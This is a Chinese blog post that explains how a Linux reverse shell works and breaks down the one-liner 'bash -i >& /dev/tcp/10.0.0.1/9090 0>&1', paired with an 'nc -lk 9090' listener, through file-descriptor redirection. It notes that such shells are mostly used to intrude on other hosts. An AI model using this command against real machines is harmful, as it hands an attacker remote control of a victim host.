Linux反弹shell命令解析

今天在看spark stream的sample样例的时候看到linux的万金油命令nc。搜索相关的内容突然发现一个很好玩的用处就是反弹shell.下面我们就来讲讲反弹shell

1. 什么是反弹shell

简单来说就是A主机可以通过执行B主机上的命令并且把返回值都返回到A上。

2. 反弹shell的用途

这个反弹shell大部分用途是用来侵入别人的主机。就是因为感觉很厉害的样子，所以才来研究这家伙

3. 反弹shell操作步骤

3.1. 在本机开启端口9090

3.2. 在需要被控制的机器上执行如下两种命令中的一种即可

3.3. 在本机刚才执行nc -lk 9090命令行下面输入需要被控制的主机的命令即可

4. 原理

这样就可以在A主机中'玩弄'B主机了

下面重点来了

我们看这个操作其实还是蛮简单的，但是我们不能只局限于表面。我们需要去了解它的原理

其实nc -lk 9090命令没什么可说的，百度google一搜就出来了。我们今天要去解释的是bash -i >& /dev/tcp/10.0.0.1/9090 0>&1。这条命令在google也没搜出来什么结果。所以只能自己加夜班搞了。

inux shell下常用的文件描述符是：

首先我们把这个命令拆解一下

其实前面3个命令组合在一起很好理解，就是把这个bash下的所有输出都发送到 10.0.0.1:9090。这个大家可以自己操作一下，去掉后面的 0>&1。

我们在命令里面写 2>&1都很好理解，就是把error重定向到stdout。但是0>&1好像不太好理解，我们看下文件描述符

这里看到的是2>&1就是把文件描述符2对应的设备改成了文件描述符1对应的设备。那么同理 0>&1就是把 0对应的设备改成的1对应的设备，那也就是socket。这就表明了 stdin就是从socket中读取数据，然后再执行命令，把bash的命令行返回内容通过stdout发到socket。

其实这些内容都可以在bash的man pages里面找到

文档里面写的很清楚 n<&word 是吧word复制给n， n>&word是吧word复制给n。

所以这里写 0<&1 或者是 0>&1都是可以的，只要把文件描述符1对应的设备复制给文件描述符0就可以了

参考文章 https://edu.aqniu.com/article/67